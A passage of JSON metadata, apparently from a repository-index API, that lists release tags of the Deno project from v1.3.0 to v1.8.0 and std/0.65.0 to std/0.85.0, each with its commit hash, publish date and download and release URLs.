d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id"